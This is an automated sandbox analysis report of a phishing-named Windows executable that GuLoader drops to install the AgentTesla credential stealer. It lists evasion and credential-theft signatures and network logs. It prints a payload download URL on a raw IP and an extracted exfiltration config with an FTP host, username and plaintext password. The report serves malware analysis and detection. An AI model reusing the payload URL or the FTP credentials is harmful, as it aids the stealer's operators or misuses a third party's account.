Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Documenti di spedizione.bat.exe

Overview

General Information

Sample name:Documenti di spedizione.bat.exe
Analysis ID:1538406
MD5:c2d72d131fe371481a0cc117bb835f23
SHA1:dd736a4b716d790f1a3b304f265530399e0646aa
SHA256:d5ee11c69acd2903e1d9b6f6b59aabbd66d9a38430fe4a020d48b18707afb9b8
Tags:exeSPAM-ITAuser-JAMESWT_MHT
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected GuLoader
AI detected suspicious sample
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Exfil Mode": "FTP", "Host": "ftp://ftp.concaribe.com", "Username": "testi@concaribe.com", "Password": "ro}UWgz#!38E"}
SourceRuleDescriptionAuthorStrings
00000004.00000002.3268012189.0000000035D3C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000004.00000002.3268012189.0000000035D11000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000004.00000002.3268012189.0000000035D11000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000000.00000002.2622907662.0000000007225000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: Documenti di spedizione.bat.exe PID: 6360JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 1 entries
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-21T08:25:12.066632+020028032702Potentially Bad Traffic192.168.2.56470284.38.129.1680TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: Documenti di spedizione.bat.exeAvira: detected
            Source: Documenti di spedizione.bat.exe.1216.0.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.concaribe.com", "Username": "testi@concaribe.com", "Password": "ro}UWgz#!38E"}
            Source: ftp.concaribe.comVirustotal: Detection: 6%Perma Link
            Source: Documenti di spedizione.bat.exeVirustotal: Detection: 15%Perma Link
            Source: Documenti di spedizione.bat.exeReversingLabs: Detection: 13%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: Documenti di spedizione.bat.exeJoe Sandbox ML: detected
            Source: Documenti di spedizione.bat.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:64703 version: TLS 1.2
            Source: Documenti di spedizione.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 0_2_0040270B FindFirstFileA,0_2_0040270B
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 0_2_004061FB FindFirstFileA,FindClose,0_2_004061FB
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 0_2_00405799 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405799
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 4_2_0040270B FindFirstFileA,4_2_0040270B
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 4_2_004061FB FindFirstFileA,FindClose,4_2_004061FB
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 4_2_00405799 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,4_2_00405799
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCacheJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeFile opened: C:\Users\user\AppData\Local\Microsoft\WindowsJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
            Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
            Source: Joe Sandbox ViewIP Address: 192.185.13.234 192.185.13.234
            Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknownDNS query: name: api.ipify.org
            Source: unknownDNS query: name: api.ipify.org
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:64702 -> 84.38.129.16:80
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /rNWbaMk175.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 84.38.129.16Cache-Control: no-cache
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /rNWbaMk175.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 84.38.129.16Cache-Control: no-cache
            Source: global trafficDNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
            Source: global trafficDNS traffic detected: DNS query: api.ipify.org
            Source: global trafficDNS traffic detected: DNS query: ftp.concaribe.com
            Source: Documenti di spedizione.bat.exe, 00000004.00000002.3250163188.00000000071D0000.00000004.00001000.00020000.00000000.sdmp, Documenti di spedizione.bat.exe, 00000004.00000002.3249854436.00000000056D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://84.38.129.16/rNWbaMk175.bin
            Source: Documenti di spedizione.bat.exe, 00000004.00000002.3249854436.00000000056D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://84.38.129.16/rNWbaMk175.bini
            Source: Documenti di spedizione.bat.exe, 00000004.00000002.3268012189.0000000035D3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://concaribe.com
            Source: Documenti di spedizione.bat.exe, 00000004.00000002.3268012189.0000000035D3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.concaribe.com
            Source: Documenti di spedizione.bat.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
            Source: Documenti di spedizione.bat.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: Documenti di spedizione.bat.exe, 00000004.00000002.3268012189.0000000035CC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Documenti di spedizione.bat.exe, 00000004.00000002.3268012189.0000000035CC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
            Source: Documenti di spedizione.bat.exe, 00000004.00000002.3268012189.0000000035CC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
            Source: Documenti di spedizione.bat.exe, 00000004.00000002.3268012189.0000000035CC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
            Source: unknownNetwork traffic detected: HTTP traffic on port 64703 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64703
            Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:64703 version: TLS 1.2
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 0_2_0040524E GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040524E

            System Summary

            barindex
            Source: initial sampleStatic PE information: Filename: Documenti di spedizione.bat.exe
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 0_2_004032BF EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004032BF
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 4_2_004032BF EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_004032BF
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeFile created: C:\Windows\SysWOW64\lamellate.iniJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 0_2_004065420_2_00406542
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 0_2_00404A8D0_2_00404A8D
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 4_2_004065424_2_00406542
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 4_2_00404A8D4_2_00404A8D
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 4_2_000D41884_2_000D4188
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 4_2_000DA2144_2_000DA214
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 4_2_000D4A584_2_000D4A58
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 4_2_000DAAAB4_2_000DAAAB
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 4_2_000D3E404_2_000D3E40
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 4_2_38CEBB904_2_38CEBB90
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 4_2_38CEA7DC4_2_38CEA7DC
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 4_2_38CF31584_2_38CF3158
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 4_2_38CF00404_2_38CF0040
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 4_2_38CFE4684_2_38CFE468
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 4_2_38CF77604_2_38CF7760
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 4_2_39202B984_2_39202B98
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 4_2_38CF00384_2_38CF0038
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: String function: 00402ACE appears 52 times
            Source: Documenti di spedizione.bat.exe, 00000004.00000002.3267969907.0000000035B89000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Documenti di spedizione.bat.exe
            Source: Documenti di spedizione.bat.exe, 00000004.00000002.3249854436.00000000056D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Documenti di spedizione.bat.exe
            Source: Documenti di spedizione.bat.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/18@3/3
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 0_2_004032BF EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004032BF
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 4_2_004032BF EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_004032BF
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 0_2_0040451A GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_0040451A
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 0_2_004020CD CoCreateInstance,MultiByteToWideChar,0_2_004020CD
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorouslyJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeMutant created: NULL
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeFile created: C:\Users\user\AppData\Local\Temp\nsgCF12.tmpJump to behavior
            Source: Documenti di spedizione.bat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Documenti di spedizione.bat.exeVirustotal: Detection: 15%
            Source: Documenti di spedizione.bat.exeReversingLabs: Detection: 13%
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeFile read: C:\Users\user\Desktop\Documenti di spedizione.bat.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Documenti di spedizione.bat.exe "C:\Users\user\Desktop\Documenti di spedizione.bat.exe"
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess created: C:\Users\user\Desktop\Documenti di spedizione.bat.exe "C:\Users\user\Desktop\Documenti di spedizione.bat.exe"
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess created: C:\Users\user\Desktop\Documenti di spedizione.bat.exe "C:\Users\user\Desktop\Documenti di spedizione.bat.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeSection loaded: ncrypt.dllJump to behavior
